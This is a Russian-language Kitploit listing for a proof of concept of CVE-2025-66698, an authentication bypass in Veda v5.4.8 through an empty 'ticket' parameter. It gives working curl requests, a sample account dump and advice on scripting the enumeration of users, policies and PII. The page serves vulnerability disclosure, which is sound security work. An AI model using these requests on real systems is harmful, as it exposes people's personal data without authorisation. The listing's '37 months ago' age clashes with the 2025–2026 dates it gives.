Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-66698 — Proof-of-concept для CVE-2025-66698: обход аутентификации в Veda v5.4.8 через пустой параметр ticket, позволяющий перечислять пользователей, политики и PII через неаутентифицированные конечные точки API. | Kitploit
Инструменты/GitHubGitHub/perunchess/cve-2025-66698
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииАутентификация
GitHubperunchess/cve-2025-66698

CVE-2025-66698

Proof-of-concept для CVE-2025-66698: обход аутентификации в Veda v5.4.8 через пустой параметр ticket, позволяющий перечислять пользователей, политики и PII через неаутентифицированные конечные точки API.

Репозиторий
37 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-66698

Целевое ПО: Veda (Semantic Machines) v5.4.8 (вероятно, все предыдущие версии). Тип уязвимости: Обход аутентификации. Идентификатор CVE: CVE-2025-66698. Краткое описание: Система некорректно проверяет параметр ticket, считая пустую строку действительной сессией. Ссылка на проект: Veda (Semantic Machines)

18 ноября 2025: Обнаружение и первоначальный запрос CVE. 9 января 2026: Присвоен идентификатор CVE. Попытка связаться с разработчиком (проигнорирована и удалена). 13 января 2026: Публичное раскрытие из-за отсутствия ответа от разработчика.

Эта уязвимость была обнаружена в ходе моего исследования безопасности при анализе кода. Параметр ticket в коде не проверяет пустое значение.

Некоторые затронутые конечные точки API:

  1. curl "https://localhost/get_individual?ticket=&uri=cfg:Administrator" -k
  2. curl "https://localhost/get_membership?ticket=&uri=cfg:SuperUser" -k
  3. curl "https://localhost/is_ticket_valid?ticket=" -k (returns "true")

Существует много пользователей по умолчанию, которых можно перечислить, также можно изменить схему: cfg на v-s и т.д., чтобы перечислить пользователей, политики, PII (полные имена, фотографии, должности, даты рождения и контактную информацию) и т.д.

root@kitploit:~
curl "https://localhost/get_individual?ticket=&uri=cfg:VedaSystem" -k
root@kitploit:~
{"@":"cfg:VedaSystem","rdf:type":[{"data":"v-s:Person","type":"Uri"}],"rdfs:isDefinedBy":[{"data":"http://semantic-machines.com/veda/system-account","type":"Uri"}],"rdfs:label":[{"data":"Система  .","lang":"RU","type":"String"},{"data":"System  .","lang":"EN","type":"String"}],"v-s:actualVersion":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:author":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:birthday":[{"data":"2014-03-04T20:00:00Z","type":"Datetime"}],"v-s:created":[{"data":"2025-11-18T14:49:45Z","type":"Datetime"}],"v-s:creator":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:defaultAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:edited":[{"data":"2025-11-18T17:08:59Z","type":"Datetime"}],"v-s:hasAccount":[{"data":"cfg:VedaSystemAccount","type":"Uri"}],"v-s:hasAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:hasAspect":[{"data":"cfg:VedaSystem_aspect","type":"Uri"}],"v-s:hasImage":[{"data":"v-s:DefaultPhoto","type":"Uri"}],"v-s:lastEditor":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:lastName":[{"data":"Система","lang":"RU","type":"String"},{"data":"System","lang":"EN","type":"String"}],"v-s:parentOrganization":[{"data":"cfg:org_Veda","type":"Uri"}],"v-s:updateCounter":[{"data":93,"type":"Integer"}],"v-ui:hasPreferences":[{"data":"cfg:VedaSystem_pref","type":"Uri"}]}

Что вы делаете, так это находите всё больше и больше таких сущностей "xxx:xxx" (cfg:xxx, v-s:xxx и т.д.). Вы можете написать простой bash-скрипт для этого. Также существует жестко закодированный systicket для достижения того же результата.

Оценка CVSS:

  • Вектор CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N Оценка: 8.6 (Высокая)
  • Вектор CVSS 4.0: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N Оценка: 9.3 (Критическая)
Скачать инструмент